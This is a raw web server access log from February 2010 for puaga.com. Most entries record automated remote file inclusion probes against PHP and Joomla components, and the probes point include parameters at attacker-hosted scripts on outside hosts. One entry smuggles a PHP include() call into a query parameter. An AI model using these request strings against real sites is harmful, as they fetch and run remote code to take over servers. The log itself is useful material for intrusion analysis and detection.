122.252.1.109 - - [10/Feb/2010:07:09:43 -0800] "GET /logs/access_091231.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:09:43 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:09:47 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:09:47 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:09:47 -0800] "GET /logs/access_091231.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:10:05 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:10:05 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.252.1.109 - - [10/Feb/2010:07:10:05 -0800] "GET /logs/access_091231.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.38.90.30 - - [10/Feb/2010:07:10:42 -0800] "GET /logs//modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
189.38.90.30 - - [10/Feb/2010:07:10:42 -0800] "GET /modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
189.38.90.30 - - [10/Feb/2010:07:10:43 -0800] "GET /logs//modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
189.38.90.30 - - [10/Feb/2010:07:10:43 -0800] "GET /modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:07:11:19 -0800] "GET /logs/access_100203.log HTTP/1.0" 200 1781328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:12:12 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:12:12 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:12:12 -0800] "GET /logs/access_100120.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:07:12:34 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:12:34 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:12:34 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:07:12:34 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:12:35 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:31 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:31 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:31 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:50 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:50 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:13:50 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:15:09 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:15:09 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:15:17 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:07:15:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:15:54 -0800] "GET /logs/access_100120.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:15:56 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:15:56 -0800] "GET /logs/access_100121.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:15:56 -0800] "GET /components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:16:12 -0800] "GET /logs/access_100105.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:16:12 -0800] "GET /logs/access.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:16:28 -0800] "GET /logs/access_100103.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [10/Feb/2010:07:16:30 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:07:17:14 -0800] "GET /logs/access_100103.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:17:26 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:17:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:17:26 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:18:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:18:20 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:07:18:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:18:55 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:19:00 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:19:00 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:19:30 -0800] "GET /logs/access.log%20%20//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [10/Feb/2010:07:20:13 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [10/Feb/2010:07:20:13 -0800] "GET //vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [10/Feb/2010:07:20:13 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:27 -0800] "GET //vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:27 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:27 -0800] "GET /logs///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:35 -0800] "GET //vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:35 -0800] "GET /logs///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:20:35 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [10/Feb/2010:07:20:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
208.93.149.176 - - [10/Feb/2010:07:20:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
208.93.149.176 - - [10/Feb/2010:07:20:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.puaga.com"
208.93.149.176 - - [10/Feb/2010:07:20:44 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:28 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:29 -0800] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:30 -0800] "GET /phpbb/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb/index.php" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:31 -0800] "GET /phpbb2/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb2/index.php" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:32 -0800] "GET /forums/index.php HTTP/1.0" 404 5258 "http://puaga.com/forums/index.php" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
203.67.235.127 - - [10/Feb/2010:07:21:33 -0800] "GET /board/index.php HTTP/1.0" 404 5258 "http://puaga.com/board/index.php" "Mozilla/5.0 (X11; Linux x86_64; U;) Gecko/20060207 Kazehakase/0.3.5 Debian/0.3.5-1" "puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:01 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:01 -0800] "GET /logs/access_100103.log%20%20//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:02 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:43 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:45 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [10/Feb/2010:07:22:45 -0800] "GET /logs/access_100103.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:07:22:50 -0800] "GET /logs/access_100111.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:07:22:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [10/Feb/2010:07:22:50 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:23:21 -0800] "GET /components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:23:21 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.68.54 - - [10/Feb/2010:07:23:26 -0800] "GET /logs/access.log%20%20//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:23:45 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:23:45 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:23:45 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:24:10 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:24:10 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:24:10 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:30 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:30 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:36 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:36 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:36 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.36.173.93 - - [10/Feb/2010:07:24:50 -0800] "GET /logs/access_100121.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:24:50 -0800] "GET /logs/access_100204.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:25:05 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:25:22 -0800] "GET /logs/access_100107.log%20%20///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:25:22 -0800] "GET //vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:25:23 -0800] "GET /logs///vwar/backup/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:25:51 -0800] "GET /logs/access_100119.log%20%20//target.com/[path]/include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [10/Feb/2010:07:25:51 -0800] "GET /logs//target.com/[path]/include/prodler.class.php?sPath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:25:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:07:25:56 -0800] "GET /logs/access_100118.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt???